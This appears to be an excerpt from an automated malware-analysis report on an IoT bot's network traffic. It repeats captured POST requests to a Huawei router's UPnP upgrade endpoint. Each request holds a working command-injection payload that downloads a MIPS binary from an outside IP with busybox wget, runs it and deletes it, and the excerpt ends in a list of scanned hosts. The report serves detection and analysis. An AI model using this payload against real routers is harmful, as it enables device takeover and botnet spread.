      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: /tmp/debug.dbg.elf (PID: 5431)Socket: 127.0.0.1:9473Jump to behavior
      Source: unknownTCP traffic detected without corresponding DNS query: 144.38.180.55
      Source: unknownTCP traffic detected without corresponding DNS query: 90.214.208.149
      Source: unknownTCP traffic detected without corresponding DNS query: 154.239.175.19
      Source: unknownTCP traffic detected without corresponding DNS query: 46.245.97.144
      Source: unknownTCP traffic detected without corresponding DNS query: 198.227.183.55
      Source: unknownTCP traffic detected without corresponding DNS query: 12.155.172.52
      Source: unknownTCP traffic detected without corresponding DNS query: 187.228.170.8
      Source: unknownTCP traffic detected without corresponding DNS query: 92.13.69.124
      Source: unknownTCP traffic detected without corresponding DNS query: 220.188.148.202
      Source: unknownTCP traffic detected without corresponding DNS query: 60.114.104.239
      Source: unknownTCP traffic detected without corresponding DNS query: 167.107.178.16
      Source: unknownTCP traffic detected without corresponding DNS query: 165.193.23.30
      Source: unknownTCP traffic detected without corresponding DNS query: 182.233.196.192
      Source: unknownTCP traffic detected without corresponding DNS query: 222.249.219.187
      Source: unknownTCP traffic detected without corresponding DNS query: 157.72.124.26
      Source: unknownTCP traffic detected without corresponding DNS query: 159.179.23.249
      Source: unknownTCP traffic detected without corresponding DNS query: 122.118.33.185
      Source: unknownTCP traffic detected without corresponding DNS query: 42.129.48.109
      Source: unknownTCP traffic detected without corresponding DNS query: 154.137.241.168
      Source: unknownTCP traffic detected without corresponding DNS query: 45.41.30.48
      Source: unknownTCP traffic detected without corresponding DNS query: 118.31.154.82
      Source: unknownTCP traffic detected without corresponding DNS query: 171.119.113.145
      Source: unknownTCP traffic detected without corresponding DNS query: 128.243.188.47
      Source: unknownTCP traffic detected without corresponding DNS query: 160.165.32.120
      Source: unknownTCP traffic detected without corresponding DNS query: 161.29.101.223
      Source: unknownTCP traffic detected without corresponding DNS query: 128.52.175.122
      Source: unknownTCP traffic detected without corresponding DNS query: 160.219.200.63
      Source: unknownTCP traffic detected without corresponding DNS query: 78.185.19.227
      Source: unknownTCP traffic detected without corresponding DNS query: 40.117.107.0
      Source: unknownTCP traffic detected without corresponding DNS query: 196.205.138.120
      Source: unknownTCP traffic detected without corresponding DNS query: 86.224.145.190
      Source: unknownTCP traffic detected without corresponding DNS query: 156.49.176.215
      Source: unknownTCP traffic detected without corresponding DNS query: 207.60.175.68
      Source: unknownTCP traffic detected without corresponding DNS query: 81.141.250.69
      Source: unknownTCP traffic detected without corresponding DNS query: 131.77.247.50
      Source: unknownTCP traffic detected without corresponding DNS query: 137.57.45.175
      Source: unknownTCP traffic detected without corresponding DNS query: 109.201.255.175
      Source: unknownTCP traffic detected without corresponding DNS query: 220.108.149.100
      Source: unknownTCP traffic detected without corresponding DNS query: 193.51.5.71
      Source: unknownTCP traffic detected without corresponding DNS query: 171.193.98.94
      Source: unknownTCP traffic detected without corresponding DNS query: 112.72.49.159
      Source: unknownTCP traffic detected without corresponding DNS query: 80.180.18.98
      Source: unknownTCP traffic detected without corresponding DNS query: 180.96.78.149
      Source: unknownTCP traffic detected without corresponding DNS query: 12.215.142.86
      Source: unknownTCP traffic detected without corresponding DNS query: 180.155.178.33
      Source: unknownTCP traffic detected without corresponding DNS query: 162.236.208.131
      Source: unknownTCP traffic detected without corresponding DNS query: 80.226.118.23
      Source: unknownTCP traffic detected without corresponding DNS query: 106.130.68.178
      Source: unknownTCP traffic detected without corresponding DNS query: 79.132.89.112
      Source: unknownTCP traffic detected without corresponding DNS query: 174.84.69.60
